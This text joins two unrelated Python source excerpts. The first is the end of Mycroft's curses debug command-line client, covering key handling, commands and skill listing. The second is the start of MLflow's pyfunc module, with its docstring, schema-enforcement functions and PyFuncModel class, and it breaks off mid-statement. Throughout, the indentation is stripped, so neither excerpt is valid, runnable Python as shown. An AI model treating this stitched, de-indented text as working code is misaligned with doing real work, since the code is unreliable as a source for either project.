col_width = 0
skill_names = sorted(skills.keys())
for skill in skill_names:
if skills[skill]['active']:
color = curses.color_pair(4)
else:
color = curses.color_pair(2)
scr.addstr(row, column, " {}".format(skill), color)
row += 1
col_width = max(col_width, len(skill))
if row == curses.LINES - 2 and column > 0 and skill != skill_names[-1]:
column = 0
scr.addstr(curses.LINES - 1, 0,
center(23) + "Press any key to continue", CLR_HEADING)
scr.refresh()
wait_for_any_key()
prepare_page()
elif row == curses.LINES - 2:
# Reached bottom of screen, start at top and move output to a
# New column
row = 2
column += col_width + 2
col_width = 0
if column > curses.COLS - 20:
# End of screen
break
scr.addstr(curses.LINES - 1, 0, center(23) + "Press any key to return",
CLR_HEADING)
scr.refresh()
def show_skill_api(skill, data):
"""Show available help on Skill's API."""
global scr
global screen_mode
if not scr:
return
screen_mode = SCR_SKILLS
row = 2
column = 0
def prepare_page():
global scr
nonlocal row
nonlocal column
scr.erase()
scr.addstr(0, 0, center(25) + "Skill-API for {}".format(skill),
CLR_CMDLINE)
scr.addstr(1, 1, "=" * (curses.COLS - 2), CLR_CMDLINE)
row = 2
column = 4
prepare_page()
for key in data:
color = curses.color_pair(4)
scr.addstr(row, column, "{} ({})".format(key, data[key]['type']),
CLR_HEADING)
row += 2
if 'help' in data[key]:
help_text = data[key]['help'].split('\n')
for line in help_text:
scr.addstr(row, column + 2, line, color)
row += 1
row += 2
else:
row += 1
if row == curses.LINES - 5:
scr.addstr(curses.LINES - 1, 0,
center(23) + "Press any key to continue", CLR_HEADING)
scr.refresh()
wait_for_any_key()
prepare_page()
elif row == curses.LINES - 5:
# Reached bottom of screen, start at top and move output to a
# New column
row = 2
scr.addstr(curses.LINES - 1, 0, center(23) + "Press any key to return",
CLR_HEADING)
scr.refresh()
def center(str_len):
# generate number of characters needed to center a string
# of the given length
return " " * ((curses.COLS - str_len) // 2)
##############################################################################
# Main UI lopo
def _get_cmd_param(cmd, keyword):
# Returns parameter to a command. Will de-quote.
# Ex: find 'abc def' returns: abc def
# find abc def returns: abc def
if isinstance(keyword, list):
for w in keyword:
cmd = cmd.replace(w, "").strip()
else:
cmd = cmd.replace(keyword, "").strip()
if not cmd:
return None
last_char = cmd[-1]
if last_char == '"' or last_char == "'":
parts = cmd.split(last_char)
return parts[-2]
else:
parts = cmd.split(" ")
return parts[-1]
def wait_for_any_key():
"""Block until key is pressed.
This works around curses.error that can occur on old versions of ncurses.
"""
while True:
try:
scr.get_wch() # blocks
except curses.error:
# Loop if get_wch throws error
time.sleep(0.05)
else:
break
def handle_cmd(cmd):
global show_meter
global screen_mode
global log_filters
global cy_chat_area
global find_str
global show_last_key
if "show" in cmd and "log" in cmd:
pass
elif "help" in cmd:
show_help()
elif "exit" in cmd or "quit" in cmd:
return 1
elif "keycode" in cmd:
# debugging keyboard
if "hide" in cmd or "off" in cmd:
show_last_key = False
elif "show" in cmd or "on" in cmd:
show_last_key = True
elif "meter" in cmd:
# microphone level meter
if "hide" in cmd or "off" in cmd:
show_meter = False
elif "show" in cmd or "on" in cmd:
show_meter = True
elif "find" in cmd:
find_str = _get_cmd_param(cmd, "find")
rebuild_filtered_log()
elif "filter" in cmd:
if "show" in cmd or "list" in cmd:
# display active filters
add_log_message("Filters: " + str(log_filters))
return
if "reset" in cmd or "clear" in cmd:
log_filters = list(default_log_filters)
else:
# extract last word(s)
param = _get_cmd_param(cmd, "filter")
if param:
if "remove" in cmd and param in log_filters:
log_filters.remove(param)
else:
log_filters.append(param)
rebuild_filtered_log()
add_log_message("Filters: " + str(log_filters))
elif "clear" in cmd:
clear_log()
elif "log" in cmd:
# Control logging behavior in all Mycroft processes
if "level" in cmd:
level = _get_cmd_param(cmd, ["log", "level"])
bus.emit(Message("mycroft.debug.log", data={'level': level}))
elif "bus" in cmd:
state = _get_cmd_param(cmd, ["log", "bus"]).lower()
if state in ["on", "true", "yes"]:
bus.emit(Message("mycroft.debug.log", data={'bus': True}))
elif state in ["off", "false", "no"]:
bus.emit(Message("mycroft.debug.log", data={'bus': False}))
elif "history" in cmd:
# extract last word(s)
lines = int(_get_cmd_param(cmd, "history"))
if not lines or lines < 1:
lines = 1
max_chat_area = curses.LINES - 7
if lines > max_chat_area:
lines = max_chat_area
cy_chat_area = lines
elif "skills" in cmd:
# List loaded skill
message = bus.wait_for_response(
Message('skillmanager.list'), reply_type='mycroft.skills.list')
if message:
show_skills(message.data)
wait_for_any_key()
screen_mode = SCR_MAIN
set_screen_dirty()
elif "deactivate" in cmd:
skills = cmd.split()[1:]
if len(skills) > 0:
for s in skills:
bus.emit(Message("skillmanager.deactivate", data={'skill': s}))
else:
add_log_message('Usage :deactivate SKILL [SKILL2] [...]')
elif "keep" in cmd:
s = cmd.split()
if len(s) > 1:
bus.emit(Message("skillmanager.keep", data={'skill': s[1]}))
else:
add_log_message('Usage :keep SKILL')
elif "activate" in cmd:
skills = cmd.split()[1:]
if len(skills) > 0:
for s in skills:
bus.emit(Message("skillmanager.activate", data={'skill': s}))
else:
add_log_message('Usage :activate SKILL [SKILL2] [...]')
elif "api" in cmd:
parts = cmd.split()
if len(parts) < 2:
return
skill = parts[1]
message = bus.wait_for_response(Message('{}.public_api'.format(skill)))
if message:
show_skill_api(skill, message.data)
scr.get_wch() # blocks
screen_mode = SCR_MAIN
set_screen_dirty()
# TODO: More commands
return 0 # do nothing upon return
def handle_is_connected(msg):
add_log_message("Connected to Messagebus!")
# start_qml_gui(bus, gui_text)
def handle_reconnecting():
add_log_message("Looking for Messagebus websocket...")
def gui_main(stdscr):
global scr
global bus
global line
global log_line_lr_scroll
global longest_visible_line
global find_str
global last_key
global history
global screen_lock
global show_gui
global config
scr = stdscr
init_screen()
scr.keypad(1)
scr.notimeout(True)
bus.on('speak', handle_speak)
bus.on('message', handle_message)
bus.on('recognizer_loop:utterance', handle_utterance)
bus.on('connected', handle_is_connected)
bus.on('reconnecting', handle_reconnecting)
add_log_message("Establishing Mycroft Messagebus connection...")
gui_thread = ScreenDrawThread()
gui_thread.setDaemon(True) # this thread won't prevent prog from exiting
gui_thread.start()
hist_idx = -1 # index, from the bottom
c = 0
try:
while True:
set_screen_dirty()
c = 0
code = 0
try:
if ctrl_c_pressed():
# User hit Ctrl+C. treat same as Ctrl+X
c = 24
else:
# Don't block, this allows us to refresh the screen while
# waiting on initial messagebus connection, etc
scr.timeout(1)
c = scr.get_wch() # unicode char or int for special keys
if c == -1:
continue
except curses.error:
# This happens in odd cases, such as when you Ctrl+Z
# the CLI and then resume. Curses fails on get_wch().
continue
if isinstance(c, int):
code = c
else:
code = ord(c)
# Convert VT100 ESC codes generated by some terminals
if code == 27:
# NOTE: Not sure exactly why, but the screen can get corrupted
# if we draw to the screen while doing a scr.getch(). So
# lock screen updates until the VT100 sequence has been
# completely read.
with screen_lock:
scr.timeout(0)
c1 = -1
start = time.time()
while c1 == -1:
c1 = scr.getch()
if time.time() - start > 1:
break # 1 second timeout waiting for ESC code
c2 = -1
while c2 == -1:
c2 = scr.getch()
if time.time() - start > 1: # 1 second timeout
break # 1 second timeout waiting for ESC code
if c1 == 79 and c2 == 120:
c = curses.KEY_UP
elif c1 == 79 and c2 == 116:
c = curses.KEY_LEFT
elif c1 == 79 and c2 == 114:
c = curses.KEY_DOWN
elif c1 == 79 and c2 == 118:
c = curses.KEY_RIGHT
elif c1 == 79 and c2 == 121:
c = curses.KEY_PPAGE # aka PgUp
elif c1 == 79 and c2 == 115:
c = curses.KEY_NPAGE # aka PgDn
elif c1 == 79 and c2 == 119:
c = curses.KEY_HOME
elif c1 == 79 and c2 == 113:
c = curses.KEY_END
else:
c = c1
if c1 != -1:
last_key = str(c) + ",ESC+" + str(c1) + "+" + str(c2)
code = c
else:
last_key = "ESC"
else:
if code < 33:
last_key = str(code)
else:
last_key = str(code)
scr.timeout(-1) # resume blocking
if code == 27: # Hitting ESC twice clears the entry line
hist_idx = -1
line = ""
elif c == curses.KEY_RESIZE:
# Generated by Curses when window/screen has been resized
y, x = scr.getmaxyx()
curses.resizeterm(y, x)
# resizeterm() causes another curses.KEY_RESIZE, so
# we need to capture that to prevent a loop of resizes
c = scr.get_wch()
elif screen_mode == SCR_HELP:
# in Help mode, any key goes to next page
show_next_help()
continue
elif c == '\n' or code == 10 or code == 13 or code == 343:
# ENTER sends the typed line to be processed by Mycroft
if line == "":
continue
if line[:1] == ":":
# Lines typed like ":help" are 'commands'
if handle_cmd(line[1:]) == 1:
break
else:
# Treat this as an utterance
bus.emit(Message("recognizer_loop:utterance",
{'utterances': [line.strip()],
'lang': config.get('lang', 'en-us')},
{'client_name': 'mycroft_cli',
'source': 'debug_cli',
'destination': ["skills"]}
))
hist_idx = -1
line = ""
elif code == 16 or code == 545: # Ctrl+P or Ctrl+Left (Previous)
# Move up the history stack
hist_idx = clamp(hist_idx + 1, -1, len(history) - 1)
if hist_idx >= 0:
line = history[len(history) - hist_idx - 1]
else:
line = ""
elif code == 14 or code == 560: # Ctrl+N or Ctrl+Right (Next)
# Move down the history stack
hist_idx = clamp(hist_idx - 1, -1, len(history) - 1)
if hist_idx >= 0:
line = history[len(history) - hist_idx - 1]
else:
line = ""
elif c == curses.KEY_LEFT:
# scroll long log lines left
log_line_lr_scroll += curses.COLS // 4
elif c == curses.KEY_RIGHT:
# scroll long log lines right
log_line_lr_scroll -= curses.COLS // 4
if log_line_lr_scroll < 0:
log_line_lr_scroll = 0
elif c == curses.KEY_HOME:
# HOME scrolls log lines all the way to the start
log_line_lr_scroll = longest_visible_line
elif c == curses.KEY_END:
# END scrolls log lines all the way to the end
log_line_lr_scroll = 0
elif c == curses.KEY_UP:
scroll_log(False, 1)
elif c == curses.KEY_DOWN:
scroll_log(True, 1)
elif c == curses.KEY_NPAGE: # aka PgDn
# PgDn to go down a page in the logs
scroll_log(True)
elif c == curses.KEY_PPAGE: # aka PgUp
# PgUp to go up a page in the logs
scroll_log(False)
elif code == 2 or code == 550: # Ctrl+B or Ctrl+PgDn
scroll_log(True, max_log_lines)
elif code == 20 or code == 555: # Ctrl+T or Ctrl+PgUp
scroll_log(False, max_log_lines)
elif code == curses.KEY_BACKSPACE or code == 127:
# Backspace to erase a character in the utterance
line = line[:-1]
elif code == 6: # Ctrl+F (Find)
line = ":find "
elif code == 7: # Ctrl+G (start GUI)
if show_gui is None:
start_qml_gui(bus, gui_text)
show_gui = not show_gui
elif code == 18: # Ctrl+R (Redraw)
scr.erase()
elif code == 24: # Ctrl+X (Exit)
if find_str:
# End the find session
find_str = None
rebuild_filtered_log()
elif line.startswith(":"):
# cancel command mode
line = ""
else:
# exit CLI
break
elif code > 31 and isinstance(c, str):
# Accept typed character in the utterance
line += c
finally:
scr.erase()
scr.refresh()
scr = None
def simple_cli():
global bSimple
bSimple = True
bus.on('speak', handle_speak)
try:
while True:
# Sleep for a while so all the output that results
# from the previous command finishes before we print.
time.sleep(1.5)
print("Input (Ctrl+C to quit):")
line = sys.stdin.readline()
bus.emit(Message("recognizer_loop:utterance",
{'utterances': [line.strip()]},
{'client_name': 'mycroft_simple_cli',
'source': 'debug_cli',
'destination': ["skills"]}))
except KeyboardInterrupt as e:
# User hit Ctrl+C to quit
print("")
except KeyboardInterrupt as e:
LOG.exception(e)
event_thread.exit()
sys.exit()
def connect_to_messagebus():
""" Connect to the mycroft messagebus and launch a thread handling the
connection.
Returns: WebsocketClient
"""
bus = MessageBusClient() # Mycroft messagebus connection
event_thread = Thread(target=connect, args=[bus])
event_thread.setDaemon(True)
event_thread.start()
return bus
|
__init__.py
|
"""
The ``python_function`` model flavor serves as a default model interface for MLflow Python models.
Any MLflow Python model is expected to be loadable as a ``python_function`` model.
In addition, the ``mlflow.pyfunc`` module defines a generic :ref:`filesystem format
<pyfunc-filesystem-format>` for Python models and provides utilities for saving to and loading from
this format. The format is self contained in the sense that it includes all necessary information
for anyone to load it and use it. Dependencies are either stored directly with the model or
referenced via a Conda environment.
The ``mlflow.pyfunc`` module also defines utilities for creating custom ``pyfunc`` models
using frameworks and inference logic that may not be natively included in MLflow. See
:ref:`pyfunc-create-custom`.
.. _pyfunc-inference-api:
*************
Inference API
*************
Python function models are loaded as an instance of :py:class:`PyFuncModel
<mlflow.pyfunc.PyFuncModel>`, which is an MLflow wrapper around the model implementation and model
metadata (MLmodel file). You can score the model by calling the :py:func:`predict()
<mlflow.pyfunc.PyFuncModel.predict>` method, which has the following signature::
predict(
model_input: [pandas.DataFrame, numpy.ndarray, scipy.sparse.(csc.csc_matrix | csr.csr_matrix),
List[Any], Dict[str, Any]]
) -> [numpy.ndarray | pandas.(Series | DataFrame) | List]
All PyFunc models will support `pandas.DataFrame` as input and DL PyFunc models will also support
tensor inputs in the form of Dict[str, numpy.ndarray] (named tensors) and `numpy.ndarrays`
(unnamed tensors).
.. _pyfunc-filesystem-format:
*****************
Filesystem format
*****************
The Pyfunc format is defined as a directory structure containing all required data, code, and
configuration::
./dst-path/
./MLmodel: configuration
<code>: code packaged with the model (specified in the MLmodel file)
<data>: data packaged with the model (specified in the MLmodel file)
<env>: Conda environment definition (specified in the MLmodel file)
The directory structure may contain additional contents that can be referenced by the ``MLmodel``
configuration.
.. _pyfunc-model-config:
MLModel configuration
#####################
A Python model contains an ``MLmodel`` file in **python_function** format in its root with the
following parameters:
- loader_module [required]:
Python module that can load the model. Expected as module identifier
e.g. ``mlflow.sklearn``, it will be imported using ``importlib.import_module``.
The imported module must contain a function with the following signature::
_load_pyfunc(path: string) -> <pyfunc model implementation>
The path argument is specified by the ``data`` parameter and may refer to a file or
directory. The model implementation is expected to be an object with a
``predict`` method with the following signature::
predict(
model_input: [pandas.DataFrame, numpy.ndarray,
scipy.sparse.(csc.csc_matrix | csr.csr_matrix), List[Any], Dict[str, Any]]
) -> [numpy.ndarray | pandas.(Series | DataFrame) | List]
- code [optional]:
Relative path to a directory containing the code packaged with this model.
All files and directories inside this directory are added to the Python path
prior to importing the model loader.
- data [optional]:
Relative path to a file or directory containing model data.
The path is passed to the model loader.
- env [optional]:
Relative path to an exported Conda environment. If present this environment
should be activated prior to running the model.
- Optionally, any additional parameters necessary for interpreting the serialized model in
``pyfunc`` format.
.. rubric:: Example
::
tree example/sklearn_iris/mlruns/run1/outputs/linear-lr
::
├── MLmodel
├── code
│ ├── sklearn_iris.py
│
├── data
│ └── model.pkl
└── mlflow_env.yml
::
cat example/sklearn_iris/mlruns/run1/outputs/linear-lr/MLmodel
::
python_function:
code: code
data: data/model.pkl
loader_module: mlflow.sklearn
env: mlflow_env.yml
main: sklearn_iris
.. _pyfunc-create-custom:
******************************
Creating custom Pyfunc models
******************************
MLflow's persistence modules provide convenience functions for creating models with the
``pyfunc`` flavor in a variety of machine learning frameworks (scikit-learn, Keras, Pytorch, and
more); however, they do not cover every use case. For example, you may want to create an MLflow
model with the ``pyfunc`` flavor using a framework that MLflow does not natively support.
Alternatively, you may want to build an MLflow model that executes custom logic when evaluating
queries, such as preprocessing and postprocessing routines. Therefore, ``mlflow.pyfunc``
provides utilities for creating ``pyfunc`` models from arbitrary code and model data.
The :meth:`save_model()` and :meth:`log_model()` methods are designed to support multiple workflows
for creating custom ``pyfunc`` models that incorporate custom inference logic and artifacts
that the logic may require.
An `artifact` is a file or directory, such as a serialized model or a CSV. For example, a
serialized TensorFlow graph is an artifact. An MLflow model directory is also an artifact.
.. _pyfunc-create-custom-workflows:
Workflows
#########
:meth:`save_model()` and :meth:`log_model()` support the following workflows:
1. Programmatically defining a new MLflow model, including its attributes and artifacts.
Given a set of artifact URIs, :meth:`save_model()` and :meth:`log_model()` can
automatically download artifacts from their URIs and create an MLflow model directory.
In this case, you must define a Python class which inherits from :class:`~PythonModel`,
defining ``predict()`` and, optionally, ``load_context()``. An instance of this class is
specified via the ``python_model`` parameter; it is automatically serialized and deserialized
as a Python class, including all of its attributes.
2. Interpreting pre-existing data as an MLflow model.
If you already have a directory containing model data, :meth:`save_model()` and
:meth:`log_model()` can import the data as an MLflow model. The ``data_path`` parameter
specifies the local filesystem path to the directory containing model data.
In this case, you must provide a Python module, called a `loader module`. The
loader module defines a ``_load_pyfunc()`` method that performs the following tasks:
- Load data from the specified ``data_path``. For example, this process may include
deserializing pickled Python objects or models or parsing CSV files.
- Construct and return a pyfunc-compatible model wrapper. As in the first
use case, this wrapper must define a ``predict()`` method that is used to evaluate
queries. ``predict()`` must adhere to the :ref:`pyfunc-inference-api`.
The ``loader_module`` parameter specifies the name of your loader module.
For an example loader module implementation, refer to the `loader module
implementation in mlflow.keras <https://github.com/mlflow/mlflow/blob/
74d75109aaf2975f5026104d6125bb30f4e3f744/mlflow/keras.py#L157-L187>`_.
.. _pyfunc-create-custom-selecting-workflow:
Which workflow is right for my use case?
########################################
We consider the first workflow to be more user-friendly and generally recommend it for the
following reasons:
- It automatically resolves and collects specified model artifacts.
- It automatically serializes and deserializes the ``python_model`` instance and all of
its attributes, reducing the amount of user logic that is required to load the model
- You can create Models using logic that is defined in the ``__main__`` scope. This allows
custom models to be constructed in interactive environments, such as notebooks and the Python
REPL.
You may prefer the second, lower-level workflow for the following reasons:
- Inference logic is always persisted as code, rather than a Python object. This makes logic
easier to inspect and modify later.
- If you have already collected all of your model data in a single location, the second
workflow allows it to be saved in MLflow format directly, without enumerating constituent
artifacts.
"""
import importlib
import tempfile
import signal
import sys
import numpy as np
import os
import pandas
import yaml
from copy import deepcopy
import logging
import threading
import collections
import subprocess
from typing import Any, Union, List, Dict, Iterator, Tuple
import mlflow
import mlflow.pyfunc.model
from mlflow.models import Model, ModelSignature, ModelInputExample
from mlflow.models.model import MLMODEL_FILE_NAME
from mlflow.models.utils import _save_example
from mlflow.pyfunc.model import ( # pylint: disable=unused-import
PythonModel,
PythonModelContext,
get_default_conda_env,
)
from mlflow.pyfunc.model import get_default_pip_requirements
from mlflow.tracking.artifact_utils import _download_artifact_from_uri
from mlflow.types import DataType, Schema, TensorSpec
from mlflow.types.utils import clean_tensor_type
from mlflow.utils import PYTHON_VERSION, get_major_minor_py_version
from mlflow.utils.annotations import deprecated
from mlflow.utils.file_utils import _copy_file_or_tree, write_to
from mlflow.utils.model_utils import (
_get_flavor_configuration,
_validate_and_copy_code_paths,
_add_code_from_conf_to_system_path,
_get_flavor_configuration_from_uri,
_validate_and_prepare_target_save_path,
)
from mlflow.utils.uri import append_to_uri_path
from mlflow.utils.environment import (
_EnvManager,
_validate_env_arguments,
_process_pip_requirements,
_process_conda_env,
_CONDA_ENV_FILE_NAME,
_REQUIREMENTS_FILE_NAME,
_CONSTRAINTS_FILE_NAME,
)
from mlflow.utils.docstring_utils import format_docstring, LOG_MODEL_PARAM_DOCS
from mlflow.utils.databricks_utils import is_in_databricks_runtime
from mlflow.exceptions import MlflowException
from mlflow.tracking._model_registry import DEFAULT_AWAIT_MAX_SLEEP_SECONDS
from mlflow.protos.databricks_pb2 import (
INVALID_PARAMETER_VALUE,
RESOURCE_DOES_NOT_EXIST,
)
from scipy.sparse import csc_matrix, csr_matrix
from mlflow.utils.requirements_utils import (
_check_requirement_satisfied,
_parse_requirements,
)
from mlflow.utils import find_free_port
from mlflow.utils.nfs_on_spark import get_nfs_cache_root_dir
FLAVOR_NAME = "python_function"
MAIN = "loader_module"
CODE = "code"
DATA = "data"
ENV = "env"
PY_VERSION = "python_version"
_logger = logging.getLogger(__name__)
PyFuncInput = Union[pandas.DataFrame, np.ndarray, csc_matrix, csr_matrix, List[Any], Dict[str, Any]]
PyFuncOutput = Union[pandas.DataFrame, pandas.Series, np.ndarray, list]
def add_to_model(model, loader_module, data=None, code=None, env=None, **kwargs):
"""
Add a ``pyfunc`` spec to the model configuration.
Defines ``pyfunc`` configuration schema. Caller can use this to create a valid ``pyfunc`` model
flavor out of an existing directory structure. For example, other model flavors can use this to
specify how to use their output as a ``pyfunc``.
NOTE:
All paths are relative to the exported model root directory.
:param model: Existing model.
:param loader_module: The module to be used to load the model.
:param data: Path to the model data.
:param code: Path to the code dependencies.
:param env: Conda environment.
:param req: pip requirements file.
:param kwargs: Additional key-value pairs to include in the ``pyfunc`` flavor specification.
Values must be YAML-serializable.
:return: Updated model configuration.
"""
params = deepcopy(kwargs)
params[MAIN] = loader_module
params[PY_VERSION] = PYTHON_VERSION
if code:
params[CODE] = code
if data:
params[DATA] = data
if env:
params[ENV] = env
return model.add_flavor(FLAVOR_NAME, **params)
def _load_model_env(path):
"""
Get ENV file string from a model configuration stored in Python Function format.
Returned value is a model-relative path to a Conda Environment file,
or None if none was specified at model save time
"""
return _get_flavor_configuration(model_path=path, flavor_name=FLAVOR_NAME).get(ENV, None)
def _enforce_mlflow_datatype(name, values: pandas.Series, t: DataType):
"""
Enforce the input column type matches the declared in model input schema.
The following type conversions are allowed:
1. object -> string
2. int -> long (upcast)
3. float -> double (upcast)
4. int -> double (safe conversion)
5. np.datetime64[x] -> datetime (any precision)
6. object -> datetime
Any other type mismatch will raise error.
"""
if values.dtype == object and t not in (DataType.binary, DataType.string):
values = values.infer_objects()
if t == DataType.string and values.dtype == object:
# NB: the object can contain any type and we currently cannot cast to pandas Strings
# due to how None is cast
return values
# NB: Comparison of pandas and numpy data type fails when numpy data type is on the left hand
# side of the comparison operator. It works, however, if pandas type is on the left hand side.
# That is because pandas is aware of numpy.
if t.to_pandas() == values.dtype or t.to_numpy() == values.dtype:
# The types are already compatible => conversion is not necessary.
return values
if t == DataType.binary and values.dtype.kind == t.binary.to_numpy().kind:
# NB: bytes in numpy have variable itemsize depending on the length of the longest
# element in the array (column). Since MLflow binary type is length agnostic, we ignore
# itemsize when matching binary columns.
return values
if t == DataType.datetime and values.dtype.kind == t.to_numpy().kind:
# NB: datetime values have variable precision denoted by brackets, e.g. datetime64[ns]
# denotes nanosecond precision. Since MLflow datetime type is precision agnostic, we
# ignore precision when matching datetime columns.
return values
if t == DataType.datetime and values.dtype == object:
# NB: Pyspark date columns get converted to object when converted to a pandas
# DataFrame. To respect the original typing, we convert the column to datetime.
try:
return values.astype(np.datetime64, errors="raise")
except ValueError:
raise MlflowException(
"Failed to convert column {0} from type {1} to {2}.".format(name, values.dtype, t)
)
numpy_type = t.to_numpy()
if values.dtype.kind == numpy_type.kind:
is_upcast = values.dtype.itemsize <= numpy_type.itemsize
elif values.dtype.kind == "u" and numpy_type.kind == "i":
is_upcast = values.dtype.itemsize < numpy_type.itemsize
elif values.dtype.kind in ("i", "u") and numpy_type == np.float64:
# allow (u)int => double conversion
is_upcast = values.dtype.itemsize <= 6
else:
is_upcast = False
if is_upcast:
return values.astype(numpy_type, errors="raise")
else:
# NB: conversion between incompatible types (e.g. floats -> ints or
# double -> float) are not allowed. While supported by pandas and numpy,
# these conversions alter the values significantly.
def all_ints(xs):
return all([pandas.isnull(x) or int(x) == x for x in xs])
hint = ""
if (
values.dtype == np.float64
and numpy_type.kind in ("i", "u")
and values.hasnans
and all_ints(values)
):
hint = (
" Hint: the type mismatch is likely caused by missing values. "
"Integer columns in python can not represent missing values and are therefore "
"encoded as floats. The best way to avoid this problem is to infer the model "
"schema based on a realistic data sample (training dataset) that includes missing "
"values. Alternatively, you can declare integer columns as doubles (float64) "
"whenever these columns may have missing values. See `Handling Integers With "
"Missing Values <https://www.mlflow.org/docs/latest/models.html#"
"handling-integers-with-missing-values>`_ for more details."
)
raise MlflowException(
"Incompatible input types for column {0}. "
"Can not safely convert {1} to {2}.{3}".format(name, values.dtype, numpy_type, hint)
)
def _enforce_tensor_spec(
values: Union[np.ndarray, csc_matrix, csr_matrix], tensor_spec: TensorSpec
):
"""
Enforce the input tensor shape and type matches the provided tensor spec.
"""
expected_shape = tensor_spec.shape
actual_shape = values.shape
actual_type = values.dtype if isinstance(values, np.ndarray) else values.data.dtype
if len(expected_shape) != len(actual_shape):
raise MlflowException(
"Shape of input {0} does not match expected shape {1}.".format(
actual_shape, expected_shape
)
)
for expected, actual in zip(expected_shape, actual_shape):
if expected == -1:
continue
if expected != actual:
raise MlflowException(
"Shape of input {0} does not match expected shape {1}.".format(
actual_shape, expected_shape
)
)
if clean_tensor_type(actual_type) != tensor_spec.type:
raise MlflowException(
"dtype of input {0} does not match expected dtype {1}".format(
values.dtype, tensor_spec.type
)
)
return values
def _enforce_col_schema(pfInput: PyFuncInput, input_schema: Schema):
"""Enforce the input columns conform to the model's column-based signature."""
if input_schema.has_input_names():
input_names = input_schema.input_names()
else:
input_names = pfInput.columns[: len(input_schema.inputs)]
input_types = input_schema.input_types()
new_pfInput = pandas.DataFrame()
for i, x in enumerate(input_names):
new_pfInput[x] = _enforce_mlflow_datatype(x, pfInput[x], input_types[i])
return new_pfInput
def _enforce_tensor_schema(pfInput: PyFuncInput, input_schema: Schema):
"""Enforce the input tensor(s) conforms to the model's tensor-based signature."""
if input_schema.has_input_names():
if isinstance(pfInput, dict):
new_pfInput = dict()
for col_name, tensor_spec in zip(input_schema.input_names(), input_schema.inputs):
if not isinstance(pfInput[col_name], np.ndarray):
raise MlflowException(
"This model contains a tensor-based model signature with input names,"
" which suggests a dictionary input mapping input name to a numpy"
" array, but a dict with value type {0} was found.".format(
type(pfInput[col_name])
)
)
new_pfInput[col_name] = _enforce_tensor_spec(pfInput[col_name], tensor_spec)
elif isinstance(pfInput, pandas.DataFrame):
new_pfInput = dict()
for col_name, tensor_spec in zip(input_schema.input_names(), input_schema.inputs):
new_pfInput[col_name] = _enforce_tensor_spec(
np.array(pfInput[col_name], dtype=tensor_spec.type), tensor_spec
)
else:
raise MlflowException(
"This model contains a tensor-based model signature with input names, which"
" suggests a dictionary input mapping input name to tensor, but an input of"
" type {0} was found.".format(type(pfInput))
)
else:
if isinstance(pfInput, pandas.DataFrame):
new_pfInput = _enforce_tensor_spec(pfInput.to_numpy(), input_schema.inputs[0])
elif isinstance(pfInput, (np.ndarray, csc_matrix, csr_matrix)):
new_pfInput = _enforce_tensor_spec(pfInput, input_schema.inputs[0])
else:
raise MlflowException(
"This model contains a tensor-based model signature with no input names,"
" which suggests a numpy array input, but an input of type {0} was"
" found.".format(type(pfInput))
)
return new_pfInput
def _enforce_schema(pfInput: PyFuncInput, input_schema: Schema):
"""
Enforces the provided input matches the model's input schema,
For signatures with input names, we check there are no missing inputs and reorder the inputs to
match the ordering declared in schema if necessary. Any extra columns are ignored.
For column-based signatures, we make sure the types of the input match the type specified in
the schema or if it can be safely converted to match the input schema.
For tensor-based signatures, we make sure the shape and type of the input matches the shape
and type specified in model's input schema.
"""
if not input_schema.is_tensor_spec():
if isinstance(pfInput, (list, np.ndarray, dict)):
try:
pfInput = pandas.DataFrame(pfInput)
except Exception as e:
raise MlflowException(
"This model contains a column-based signature, which suggests a DataFrame"
" input. There was an error casting the input data to a DataFrame:"
" {0}".format(str(e))
)
if not isinstance(pfInput, pandas.DataFrame):
raise MlflowException(
"Expected input to be DataFrame or list. Found: %s" % type(pfInput).__name__
)
if input_schema.has_input_names():
# make sure there are no missing columns
input_names = input_schema.input_names()
expected_cols = set(input_names)
actual_cols = set()
if len(expected_cols) == 1 and isinstance(pfInput, np.ndarray):
# for schemas with a single column, match input with column
pfInput = {input_names[0]: pfInput}
actual_cols = expected_cols
elif isinstance(pfInput, pandas.DataFrame):
actual_cols = set(pfInput.columns)
elif isinstance(pfInput, dict):
actual_cols = set(pfInput.keys())
missing_cols = expected_cols - actual_cols
extra_cols = actual_cols - expected_cols
# Preserve order from the original columns, since missing/extra columns are likely to
# be in same order.
missing_cols = [c for c in input_names if c in missing_cols]
extra_cols = [c for c in actual_cols if c in extra_cols]
if missing_cols:
raise MlflowException(
"Model is missing inputs {0}."
" Note that there were extra inputs: {1}".format(missing_cols, extra_cols)
)
elif not input_schema.is_tensor_spec():
# The model signature does not specify column names => we can only verify column count.
num_actual_columns = len(pfInput.columns)
if num_actual_columns < len(input_schema.inputs):
raise MlflowException(
"Model inference is missing inputs. The model signature declares "
"{0} inputs but the provided value only has "
"{1} inputs. Note: the inputs were not named in the signature so we can "
"only verify their count.".format(len(input_schema.inputs), num_actual_columns)
)
return (
_enforce_tensor_schema(pfInput, input_schema)
if input_schema.is_tensor_spec()
else _enforce_col_schema(pfInput, input_schema)
)
class PyFuncModel:
"""
MLflow 'python function' model.
Wrapper around model implementation and metadata. This class is not meant to be constructed
directly. Instead, instances of this class are constructed and returned from
:py:func:`load_model() <mlflow.pyfunc.load_model>`.
``model_impl`` can be any Python object that implements the `Pyfunc interface
<https://mlflow.org/docs/latest/python_api/mlflow.pyfunc.html#pyfunc-inference-api>`_, and is
returned by invoking the model's ``loader_module``.
``model_meta`` contains model metadata loaded from the MLmodel file.
"""
def __init__(self, model_meta: Model, model_impl: Any):
if not hasattr(model_impl, "predict"):
raise MlflowException("Model implementation is missing required predict method.")
if not model_meta:
raise MlflowException("Model is missing metadata.")
self._model_meta = model_meta
self._model_impl = model_impl
def predict(self, data: PyFuncInput) -> PyFuncOutput:
"""
Generate model predictions.
If the model contains signature, enforce the input schema first before calling the model
implementation with the sanitized input. If the pyfunc model does not include model schema,
the input is passed to the model implementation as is. See `Model Signature Enforcement
<https://www.mlflow.org/docs/latest/models.html#signature-enforcement>`_ for more details."
:param data: Model input as one of pandas.DataFrame, numpy.ndarray,
scipy.sparse.(csc.csc_matrix | csr.csr_matrix), List[Any], or
Dict[str, numpy.ndarray]
:return: Model predictions as one of pandas.DataFrame, pandas.Series, numpy.ndarray or list.
"""
input_schema = self.metadata.get_input_schema()
if input_schema is not None:
data = _enforce_schema(data, input_schema)
return self._model_impl.predict(data)
@property
def metadata(self):
"""Model metadata."""
if self._model_meta is None:
raise MlflowException("Model is missing metadata.")
return self._model_meta
def __repr__(self):
info = {}
if self._model_meta is not None:
if hasattr(self._model_meta, "run_id") and self._model_meta.run_id is not None:
info["run_id"] = self._model_meta.run_id
if (
hasattr(self._model_meta, "artifact_path")
